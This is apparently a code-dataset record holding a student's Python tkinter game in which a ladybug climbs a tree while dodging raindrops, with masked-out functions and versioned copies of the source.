font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef drawDifficulties(canvas, data):\n canvas.create_text(data.medX, data.AITY, text='Computer Difficulty:',\n font='Arial 23 bold', fill='yellow')\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Easy')\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium')\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Hard')\n if data.difficulty != None:\n data.enter = data.click\n canvas.create_image(data.medX, data.enterY, image=data.enter)\n canvas.create_text(data.medX, data.enterY, text='Enter')\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\ndef addExtraCoconut(data):\n if data.time % 18 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(755, 0))\n if data.time % 37 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\ndef AIKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'Left' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player2X = 550\n elif event.keysym == 'Right' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player2X = 750\n\n\ndef AIMousePressed(event, data):\n checkHome(event, data)\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n", "step-5": "#Arushi Patel (aruship)\r\nfrom tkinter import *\r\nimport random\r\n\r\n######################################\r\n#images taken from wikipedia,pixabay,\r\n#trans americas, clipartpanda,pngimg,\r\n#findicons, microsoft word\r\n######################################\r\n\r\n####################################\r\n# init\r\n####################################\r\ndef init(data):\r\n data.score =0\r\n data.mode = \"splashScreen\"\r\n data.timerDelay = 100\r\n data.height = 800\r\n data.width = 800\r\n data.speed = 10\r\n data.speedAI = 12\r\n data.speedAI2 = 12\r\n data.switchOnProgress = False\r\n data.r = 25\r\n data.cx= 280\r\n data.cy=750\r\n data.onLeft1, data.onLeft2 = True, True\r\n data.win= False\r\n data.coconuts = []\r\n data.powerUps = []\r\n data.coconuts1 = []\r\n data.coconuts2 = []\r\n data.coconutsAI1 =[]\r\n data.coconutsAI2 = []\r\n data.invincible = []\r\n data.pauseDrops = False\r\n data.pause1Drop = False\r\n data.pause2Drop = False\r\n init1(data)\r\n\r\ndef init1(data):\r\n data.beInvincible = False\r\n data.Invincible1 = False\r\n data.Invincible2 = False\r\n data.scaryBug = []\r\n data.time = 0\r\n data.coconutFall = False\r\n data.sides = [\"r\", \"l\"]\r\n data.level = 1\r\n data.splashScreenTime = 0\r\n data.splashScreenDrops = []\r\n data.background= PhotoImage(file=\"tree.gif\")\r\n data.deadScreen = PhotoImage(file = \"deadBug.gif\")\r\n data.ladyBug = PhotoImage(file = \"lady.gif\")\r\n data.winScreen= PhotoImage(file = \"treeTop1.gif\")\r\n data.winBug = PhotoImage(file = \"littleBug.gif\")\r\n data.halfBackground = PhotoImage(file = \"halfTree.gif\")\r\n data.umbrella = PhotoImage(file = \"umbrella2.gif\")\r\n data.spider = PhotoImage(file = \"spider.gif\")\r\n data.hourGlass = PhotoImage(file = \"hourGlass.gif\")\r\n data.splashScreen = PhotoImage(file = \"splash.gif\")\r\n init2(data)\r\n\r\ndef init2(data):\r\n data.tbg= PhotoImage(file = \"tbg2.gif\")\r\n data.click = PhotoImage(file = \"click.gif\")\r\n data.notClick = PhotoImage(file = \"notClick.gif\")\r\n data.player1X = 150\r\n data.player1Y = 750\r\n data.player2X = 550\r\n data.player2Y = 750\r\n data.winner = None\r\n data.speed = 12\r\n data.speed2 = 12\r\n data.editorTime = 0\r\n data.editorDrops = []\r\n data.margin = 100\r\n data.enter = False\r\n data.powerUpsEditor = None\r\n data.yourSpeed = None\r\n data.rainSpeed = None\r\n data.slow= data.notClick\r\n data.medium = data.notClick\r\n data.fast = data.notClick\r\n data.drizzle = data.notClick\r\n data.rain =data.notClick\r\n data.thunderstorm = data.notClick\r\n init3(data)\r\n\r\ndef init3(data):\r\n data.yes = data.notClick\r\n data.no = data.notClick\r\n data.enter = data.notClick\r\n data.levelEditorLives =2\r\n data.rSpeed = None\r\n data.start = None\r\n data.start1 = None\r\n data.start2 = None\r\n data.difficulty = None\r\n data.mode1 = data.notClick\r\n data.mode2 = data.notClick\r\n data.mode3 = data.notClick\r\n data.mode4 = data.notClick\r\n data.mode5 = data.notClick\r\n data.mode6 = data.notClick\r\n data.home = PhotoImage(file = \"home.gif\")\r\n data.helpScreen = PhotoImage(file = \"help1.gif\")\r\n data.title = PhotoImage(file = \"title.gif\")\r\n data.scoreList = []\r\n data.spotList = [270,364,458,552, 646, 740]\r\n data.savedScores = readFile(\"score.txt\")\r\n if data.mode == \"levelCreated\":\r\n setEverything(data)\r\n initsplashScreenNumbers(data)\r\n\r\ndef initsplashScreenNumbers(data):\r\n data.splashButtonY = 425\r\n data.p1ButtonX= 225\r\n data.p2ButtonX = 290\r\n data.edButton = 355\r\n data.diffButton = 425\r\n data.helpButton = 490\r\n data.sboardButton = 555\r\n data.hitPenalty = 75\r\n data.splashText = data.height/2-20\r\n data.lives = 2\r\n data.levelMax = 8\r\n data.lane = 94\r\n data.Player1Min= 270\r\n data.Player1Max = 740\r\n data.homeX =50\r\n data.homeY = 650\r\n initScoreBoardHelp(data)\r\n init1Player(data)\r\n\r\ndef initScoreBoardHelp(data):\r\n data.tbgY=5*data.height/12\r\n data.txtTScore = 150\r\n data.S_P = 220\r\n data.numScores = 5\r\n data.scorePos = data.height/10\r\n data.scoreShift = 270\r\n data.helpY = data.height/2-20\r\n data.name = \"\"\r\n data.printName = \"\"\r\n data.hit = False\r\n initAI(data)\r\n\r\ndef init1Player(data):\r\n data.buffer = 40\r\n\r\ndef initAI(data):\r\n data.AITY = 225\r\n data.easyX = 200\r\n data.easyY = 300\r\n data.medX =400\r\n data.hardX = 600\r\n data.enterY = 450\r\n data.difS = 4\r\n data.difM = 6\r\n data.difH = 8\r\n data.last = 500\r\n data.enterX = 575\r\n data.PUT = 450\r\n data.RST = 350\r\n data.YST = 250\r\n####################################\r\n# mode dispatcher\r\n####################################\r\n\r\ndef mousePressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashScreenMousePressed(event, data)\r\n elif (data.mode == \"1Player\"): playerMousePressed(event, data)\r\n elif (data.mode == \"2Player\"): twoPlayerMousePressed(event, data)\r\n elif (data.mode == \"editor\"): editorMousePressed(event,data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedMousePressed(event,data)\r\n elif (data.mode == \"AI\"): AIMousePressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyMousePressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardMousePressed(event, data)\r\n elif (data.mode == \"help\"): helpMousePressed(event, data)\r\n\r\ndef keyPressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashKeyPressed(event, data)\r\n elif (data.mode == \"1Player\"):playerKeyPressed(event, data)\r\n elif (data.mode == \"2Player\"):twoPlayerKeyPressed(event, data)\r\n elif (data.mode == \"editor\"): editorKeyPressed(event, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedKeyPressed(event,data)\r\n elif (data.mode == \"AI\"): AIKeyPressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyKeyPressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardKeyPressed(event, data)\r\n elif (data.mode == \"help\"): helpKeyPressed(event, data)\r\n \r\ndef timerFired(data):\r\n if (data.mode == \"splashScreen\"): splashScreenTimerFired(data)\r\n elif (data.mode == \"1Player\"):playerTimerFired(data)\r\n elif (data.mode == \"2Player\"):twoPlayerTimerFired(data)\r\n elif (data.mode == \"editor\"): editorTimerFired(data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedTimerFired(data)\r\n elif (data.mode == \"AI\"): AITimerFired(data)\r\n elif (data.mode == \"difficulty\"): difficultyTimerFired(data)\r\n elif (data.mode == \"scoreboard\"): scoreboardTimerFired(data)\r\n elif (data.mode == \"help\"): helpTimerFired(data)\r\n\r\ndef redrawAll(canvas, data):\r\n if (data.mode == \"splashScreen\"): splashScreenRedrawAll(canvas, data)\r\n elif (data.mode == \"1Player\"):playerRedrawAll(canvas, data)\r\n elif (data.mode == \"2Player\"):twoPlayerRedrawAll(canvas, data)\r\n elif (data.mode == \"editor\"): editorRedrawAll(canvas, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedRedrawAll(canvas,data)\r\n elif (data.mode == \"AI\"): AIRedrawAll(canvas, data)\r\n elif (data.mode == \"difficulty\"): difficultyRedrawAll(canvas, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardRedrawAll(canvas, data)\r\n elif (data.mode == \"help\"): helpRedrawAll(canvas, data)\r\n\r\n####################################\r\n# splashScreen mode\r\n####################################\r\ndef splashScreenMousePressed(event, data):\r\n #checks for selection of mode\r\n if data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r:\r\n if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r:\r\n data.mode = \"1Player\"\r\n if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r:\r\n data.mode = \"2Player\"\r\n if data.edButton-data.r<=event.y<=data.edButton+data.r:\r\n data.mode = \"editor\"\r\n if data.diffButton-data.r<=event.y<=data.diffButton+data.r:\r\n data.mode = \"difficulty\"\r\n if data.helpButton-data.r<=event.y<=data.helpButton+data.r:\r\n data.mode = \"help\"\r\n if data.sboardButton-data.r<=event.y<=data.sboardButton+data.r:\r\n data.mode = \"scoreboard\"\r\n\r\ndef splashKeyPressed(event, data):\r\n pass\r\n\r\n\r\ndef splashScreenTimerFired(data):\r\n data.splashScreenTime += 1\r\n if data.splashScreenTime %2 ==1:\r\n rainDropSplash(data)\r\n for drop in data.splashScreenDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef splashScreenButtons(canvas, data):\r\n canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1)\r\n canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2)\r\n canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3)\r\n canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4)\r\n canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5)\r\n canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6)\r\n \r\ndef rainDropSplash(data):\r\n xPosition = random.randint(0,800)\r\n data.splashScreenDrops.append(Coconuts(xPosition,0))\r\n\r\ndef splashScreenRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.splashText-10, image=data.title)\r\n for drop in data.splashScreenDrops: drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.splashText, text=\"\"\"\r\n 1.) Single Player Level Mode\r\n\r\n\r\n 2.) Two-Player Mode\r\n\r\n \r\n 3.) Level Creator Practice Mode\r\n\r\n \r\n 4.) Play Against the Computer\r\n\r\n \r\n 5.) Help and Instructions\r\n\r\n \r\n 6.) Scoreboard\r\n\r\n \r\n \"\"\", font=\"Arial 14 bold\", fill = \"yellow\")\r\n splashScreenButtons(canvas, data)\r\n\r\n####################################\r\n# taken from class notes\r\n####################################\r\n\r\ndef writeFile(path, contents):\r\n with open(path, \"wt\") as f:\r\n f.write(contents)\r\n\r\ndef readFile(path):\r\n with open(path, \"rt\") as f:\r\n return f.read()\r\n\r\n####################################\r\n# 1Player mode\r\n####################################\r\n\r\n\r\n#Coconuts (from Mario game) represent the water drops\r\nclass Coconuts(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.r = 9\r\n self.fill = \"deep sky blue\"\r\n self.speed = 30\r\n self.outline= \"blue\"\r\n\r\n def draw(self, canvas):\r\n canvas.create_polygon(self.x,self.y- 2*self.r,\r\n self.x-self.r, self.y,\r\n self.x, self.y + self.r,\r\n self.x+self.r, self.y, fill = self.fill,\r\n outline = self.outline, width = 3)\r\n\r\n def onTimerFired(self, data):\r\n # downward falling motion\r\n self.y += self.speed\r\n \r\ndef hit(data):\r\n #checks for hitting rain\r\n for coconut in data.coconuts:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r:\r\n if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r:\r\n data.cy+=data.hitPenalty\r\n if data.mode == \"levelCreated\":\r\n data.lives-=1\r\n elif data.hit ==False and data.level<data.levelMax:\r\n data.score -=data.level\r\n data.coconuts.remove(coconut)\r\n if data.mode == \"levelCreated\":\r\n data.levelEditorLives-=1\r\n\r\n \r\ndef hit2Player(data):\r\n if data.mode == \"2Player\":\r\n if data.Invincible1 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts1:\r\n if coconut.y>=data.player1Y-data.r \\\r\n and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=data.hitPenalty \r\n data.coconuts1.remove(coconut)\r\n if data.Invincible2 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts2:\r\n if coconut.y>=data.player2Y-data.r and \\\r\n coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=data.hitPenalty \r\n data.coconuts2.remove(coconut)\r\n\r\n\r\nclass PowerUps(Coconuts):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.hourGlass)\r\n \r\ndef hitPause(data):\r\n # checks if hits hour-glass & pauses with flag\r\n for powerUp in data.powerUps:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:\r\n data.pauseDrops = True\r\n data.start = data.cy\r\n data.powerUps.remove(powerUp)\r\n elif data.mode == \"2Player\" or data.mode == \"AI\":\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.pause1Drop = True\r\n data.start1 = data.player1Y\r\n data.powerUps.remove(powerUp)\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.pause2Drop = True\r\n data.start2 = data.player2Y\r\n data.powerUps.remove(powerUp)\r\n \r\n\r\nclass Invincible(PowerUps):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n \r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.umbrella)\r\n\r\ndef hitInvincible(data):\r\n #checks if hits umbrella powerup\r\n for powerUp in data.invincible:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:\r\n data.beInvincible = True\r\n data.start = data.cy\r\n data.invincible.remove(powerUp)\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n #for player1\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.Invincible1=True\r\n data.start1 = data.player1Y\r\n data.invincible.remove(powerUp)\r\n # for player 2\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.Invincible2=True\r\n data.start2 = data.player2Y\r\n 